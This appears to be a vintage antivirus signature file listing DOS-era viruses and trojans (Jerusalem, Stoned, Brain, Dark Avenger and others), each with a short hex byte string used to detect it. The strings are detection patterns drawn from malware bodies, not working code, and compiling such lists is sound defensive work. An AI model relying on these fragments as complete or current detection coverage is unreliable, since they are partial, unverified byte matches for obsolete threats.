Armagedon Virus [Arma]:
0xb8 0x00 0x43 0xcd 0x21 0x2e 0x89 0x0e
0x48 0x01
1381 Virus [1381]:
0x1e 0x06 0x8c 0xc8 0x8e 0xd8 0xb8 0x40
0x00 0x8e
Tiny Virus [Tiny]:
0xb4 0x40 0x8d 0x94 0xab 0x01 0xb9 0x02
0x00 0xcd
Subliminal Virus [Sub]:
0x8b 0x3e 0x25 0x01 0x8b 0xd7 0x2e 0x8e
0x06 0x27
Sorry Virus [Sorry]:
0xeb 0x96 0x83 0x2e 0x12 0x00 0x40 0x83
0x2e 0x03
1024 Virus [1024]:
0xc8 0x75 0xed 0x8b 0xd1 0xb8 0x00 0x42
0xcd 0x21 0x72
RedX Virus [RedX]:
0x52 0x8b 0x9c 0x17 0x04 0xb9 0x19 0x03
0x8d 0x94
VP Virus [VP]:
0x21 0x89 0x1e 0x22 0x03 0x8c 0x06 0x24
0x03 0xb4
Print Screen-2 [P-2]:
0x74 0x01 0xbf 0x03 0x00 0xb9 0x20 0x00
0xf3 0xa4
Joshi Virus [Joshi]:
0xf3 0xa4 0x8c 0xc0 0x05 0x20 0x00 0x8e
0xc0 0xbb
Microbes Virus [Micro]:
0x8e 0xd0 0xbc 0x00 0xf0 0xfb 0xa1 0x13
0x04 0x2d 0x04
Print Screen Virus [Prtscr]:
0xcd 0x05 0xfe 0xc8 0xa2 0x60 0x01 0xc3
0x6f 0x6e 0x2d
Form Virus [Form]:
0xe8 0xb2 0x00 0x5a 0x5e 0x1f 0x33 0xc0
0x50 0xb8 0x00 0x7c
June 13th Virus [J13]:
0x12 0x00 0xb9 0xb1 0x04 0x2e 0x30 0x04
0x46 0xe2
JoJo Virus [JoJo]:
0x4d 0x2b 0xd0 0x4a 0x45 0x03 0xe8 0x45
0x8e 0xc5
Victor Virus [Victor]:
0x74 0x26 0x80 0xfc 0x5b 0x74 0x21 0x80
0xfc 0x39
5120 Virus [5120]:
0x10 0xa2 0xf6 0x0f 0xe8 0xd0 0xfe 0x80
0x3e 0x4a 0x10 0x02 0x7d 0x22 0xc6 0x46
W-13 Virus [W13]:
0xf3 0xa4 0x8b 0xfa 0xb4 0x30 0xcd 0x21
0x3c 0x00
Slow Virus [Slow]:
0x81 0xc6 0x1b 0x00 0xb9 0x90 0x06 0x2e
0x80 0x34
Liberty Virus [Liberty]:
0xe8 0xfd 0xfe 0x72 0x2a 0x3b 0xc1 0x7c
0x27 0xe8
Fish Virus [Fish]:
0x0e 0x01 0xcf 0xe8 0x00 0x00 0x5b 0x81
0xeb 0xa9
Shake Virus [Shake]:
0x31 0xd2 0x8b 0xca 0xcd 0x21 0x3d 0x00
0xf0 0x73
Murphy Virus [Murphy]:
0x81 0x7c 0xfe 0x2e 0x43 0x75 0xed 0xb8
0x02 0x3d
V800 Virus [V800]:
0x51 0xad 0x33 0xd0 0xe2 0xfb 0x59 0x31
0x15 0x47
Kennedy Virus [Kennedy]:
0x8c 0x55 0x02 0xb8 0x01 0x43 0x33 0xc9
0xcd 0x21
Yankee Two Virus [Doodle2]:
0x73 0x03 0x5a 0x5e 0xc3 0x8b 0xf2 0xf6
0x44 0x15
1971 Virus [1971]:
0x33 0xd2 0xb8 0x00 0x42 0xcd 0x21 0x72
0x26 0x81 0x7c
June 16th Virus [June16]:
0x4d 0xa9 0xa5 0x2e 0x70 0x66 0x2e 0x57
0x09 0x0f
AIDS II Virus [A2]:
0xa4 0x00 0x55 0x89 0xe5 0x81 0xec 0x02
0x02 0xbf 0xca 0x05 0x0e 0x57 0xbf 0x3e
0x01
1210 Virus [1210]:
0xc4 0x74 0xf0 0x2e 0x80 0x3e 0x2f 0x04
0x01 0x75
1720 Virus [1720]:
0xd8 0x2e 0xa1 0x2c 0x00 0xa3 0xfc 0x03
0x2e 0xa0
Saturday 14th Virus [Sat14]:
0x0e 0x1f 0xb8 0x24 0x35 0xcd 0x21 0x8c
0x06 0x6f
XA1 (1539) Christmas Virus [XA1]:
0xfa 0x8b 0xec 0x58 0x32 0xc0 0x89 0x46
0x02 0x81
1392 (Amoeba) Virus [1392]:
0x16 0xa3 0x21 0x01 0x8b 0x44 0x14 0xa3
0x23 0x01
Vcomm Virus [Vcomm]:
0x77 0x02 0xb9 0x20 0x00 0xb4 0x4e 0xcd
0x21
ItaVir Virus [Ita]:
0xb8 0x58 0x45 0x89 0x40 0x02 0xb0 0x00
0x88 0x40 0x04
Korea Virus [Korea]:
0x8e 0xd0 0xbc 0xf0 0xff 0xfb 0xbb 0x13
0x04
Solano Virus [Solano]:
0x12 0x75 0x0e 0x2e 0x8b 0x0e 0x03 0x01
V2000 Virus [2000]:
0x51 0xe8 0x39 0xfd 0x8e 0xc3 0x26 0x8b
12 Tricks Trojan [Tricks]:
0x64 0x02 0x31 0x94 0x42 0x01 0xd1 0xc2
0x4e 0x79 0xf7
12 Tricks Trojan [Tricks-B]:
0xe4 0x61 0x8a 0xe0 0x0c 0x80 0xe6 0x61
1559 Virus [1559]:
0x03 0x26 0x89 0x1e 0x92 0x00 0xfb 0xc3
0x50 0x53 0x51 0x52 0x06
512 Virus [512]:
0x01 0x8c 0x45 0x70 0x1f 0x89 0x57 0x14
0x8c 0xca 0x8e 0xda
EDV Virus [EDV]:
0x75 0x1c 0x80 0xfe 0x01 0x75 0x17 0x5b
0x07 0x1f 0x58 0x83
Icelandic-3 Virus [Ice-3]:
0x24 0x2e 0x8f 0x06 0x3b 0x03 0x90 0x2e
0x8f 0x06
Perfume Virus [Fume]:
0x04 0x06 0xbf 0xba 0x00 0x57 0xcb 0x0e
0x1f 0x8e 0x06
Joker Virus [Joke]:
0x56 0x07 0x45 0x07 0x21 0x07 0x1d 0x49
0x27 0x6d 0x20 0x73 0x6f 0x20 0x6d 0x75
0x63
Virus-101 [101]:
0xb3 0x01 0xb4 0x36 0x70 0xb7 0x01 0xb4
0x36 0x70 0x8b 0x37 0xb4 0x36 0x70 0xb3
0x03 0xb4 0x36 0x70 0x03 0xf3 0xb4
Halloechen Virus [Hal]:
0x8c 0xd0 0x8b 0xd4 0xbc 0x02 0x00 0x36
0x8b 0x0e
Taiwan Virus [Taiwan]:
0x8a 0x0e 0x95 0x00 0x81 0xe1 0xfe 0x00
0xba 0x9e
Oropax Virus [Oro]:
0x3e 0x01 0x1d 0xf2 0x77 0xd1 0xba 0x00
Chaos Virus [Chaos]:
0xa1 0x49 0x43 0x68 0x41 0x4f 0x53 0x50
0x52 0x51 0xe8
4096 Virus [4096]:
0xf6 0x2e 0x8f 0x06 0x41 0x12 0x2e 0x8f
0x06 0x43
Virus-90 [90]:
0x81 0xb8 0xfe 0xff 0x8e 0xd8 0x2d 0xcc
AIDS Information Trojan [Aids]:
0x31 0x30 0x30 0x2c 0x36 0x32 0x2c 0x33
0x32 0x00
Devil's Dance Virus [Dance]:
0x5e 0x1e 0x06 0x8c 0xc0 0x48 0x8e 0xc0
0x26
Amstrad Virus [Amst]:
0x72 0x02 0xeb 0x36 0x76 0xba 0x80 0x00
0xb4 0x1a 0xcd 0x21 0x80 0x3e
Datacrime II-b Virus [Crime-2B]:
0x2e 0x8a 0x07 0x32 0xc2 0xd0 0xca 0x2e
Holland Girl Virus [Holland]:
0x36 0x03 0x01 0x33 0xc9 0x33 0xc0 0xac
Do Nothing Virus [Nothing]:
0x72 0x04 0x50 0xeb 0x07 0x90 0xb4 0x4c
Lisbon Virus [Lisb]:
0x8b 0x44 0x79 0x3d 0x0a 0x00 0x72 0xde
Sunday Virus [Sunday]:
0x75 0x10 0x07 0x2e 0x8e 0x16 0x45 0x00
0x2e 0x8b
Typo COM virus [Typo]:
0x99 0xfe 0x26 0xa1 0x5a 0x00 0x2e 0x89
DBASE Virus [Dbase]:
0x80 0xfc 0x6c 0x74 0xea 0x80 0xfc 0x5b
0x74 0xe5
Ghost Virus :
0x90 0xea 0x59 0xec 0x00 0xf0 0x90 0x90
Jerusalem Virus Strain B [Jeru]:
0x47 0x00 0x33 0xc0 0x8e 0xc0 0x26 0xa1
0xfc 0x03
Alabama Virus [Alabama]:
0x8f 0x06 0x18 0x05 0x26 0x8f 0x06 0x1a
1701/1704 Virus - Version B [170X]:
0x31 0x34 0x31 0x24 0x46 0x4c
Datacrime Virus [Crime]:
0x36 0x01 0x01 0x83 0xee 0x03 0x8b 0xc6
0x3d 0x00
Stoned Virus [Stoned]:
0x00 0x53 0x51 0x52 0x06 0x56 0x57 0xbe
Vacsina virus [Vacs]:
0xb8 0x01 0x43 0x8e 0x5e 0x0e 0x8b 0x56
0x06 0x2e
Den Zuk Virus :
0x8e 0xc0 0xbe 0xc6 0x7c 0xbf 0x00 0x7e
Ping Pong Virus (old string):
0x59 0x5b 0x58 0x07 0x1f 0xea
Pakistani Brain Virus [Brain]:
0x8e 0xd8 0x8e 0xd0 0xbc 0x00 0xf0 0xfb
0xa0 0x06
Yale/Alameda Virus [Alameda]:
0xb4 0x00 0xcd 0x13 0x72 0x0d 0xb8 0x01
Lehigh Virus [Lehigh]:
0x5e 0x83 0xee 0x03 0x8b 0xde 0x81 0xeb
0x91 0x01
Pakistani Brain/Ashar Virus [Brain]:
0x20 0x8c 0xc8 0x8e 0xd8 0x8e 0xd0
Fu Manchu Virus - Version A [Fu]:
0x26 0xc7 0x06 0xfc 0x03 0xf3 0xa4 0x26
0xc6 0x06
Ping Pong Virus - Version B [Ping]:
0xa1 0xf5 0x81 0xa3 0xf5 0x7d 0x8b 0x36
0xf9 0x81
1536 (Zero Bug) Virus [Zero]:
0xeb 0x2b 0x90 0x5a 0x45 0xcd 0x60 0x2e
Vienna (DOS 62) Virus - Version B [Vienna]:
0x8b 0xfe 0x36 0x6f 0xc7 0x1f 0x36 0x6f
0x8b 0xde 0x36 0x6f 0xc6 0x1f
Ghost Version of DOS-62 [Ghost-C]:
0x8e 0xd8 0xa1 0x13 0x04 0x2d 0x02 0x00
0x90 0xa3 0x13
Friday 13th Virus [Fri13]:
0xb4 0x4f 0xcd 0x21 0x73 0xf7 0x58
405 virus [405]:
0x19 0xcd 0x21 0x26 0xa2 0x49 0x02 0xb4
0x47 0x04 0x01 0x50
3066/2930 Traceback Virus [3066]:
0x14 0x8b 0x4d 0x16 0x8b 0xc1 0x8a 0xcd
Pentagon Virus :
0xeb 0x34 0x90 0x48 0x41 0x4c 0x20 0x20
Israeli Boot Virus:
0xcd 0x13 0xb8 0x02 0x02 0xb9 0x06 0x27
0xba 0x00 0x01
Typo Boot Virus:
0x24 0x13 0x55 0xaa
Datacrime-2 Virus [Crime-2]:
0x8a 0x94 0x03 0x01 0x8d 0xbc 0x29 0x01
0x8d 0x8c 0xea 0x06
Ohio Virus:
0xeb 0x29 0x90 0x49 0x34 0x12 0x00 0x01
0x00 0x00 0x00 0x00
3551 (Syslock) Virus [Syslock]:
0x33 0x06 0x14 0x00 0x31 0x04 0x46 0x46
0xe2 0xf2
Dark Avenger virus [Dav]:
0xa1 0x4f 0x07 0x89 0x07 0x2e 0xa1 0x51
MIX1/Icelandic Virus [Ice]:
0x43 0x81 0x3f 0x45 0x58 0x75 0xf1 0xb8
0x00 0x43
Disk Killer Virus [Killer]:
0xc3 0x10 0xe2 0xf2 0xc6 0x06 0xf3 0x01
0xff 0x90 0xeb 0x55
AIDS Virus [Taunt]:
0x42 0xe8 0xef 0xe3 0xbf 0xca 0x03 0x1e
Yankee Doodle Virus [Doodle]:
0x35 0xcd 0x21 0x8b 0xf3 0x8c 0xc7
Suriv A Virus [SurivA]:
0x90 0x73 0x55 0x52 0x49 0x56 0x00
Suriv B Virus [SurivB]:
0x00 0x73 0x55 0x52 0x49 0x56 0x00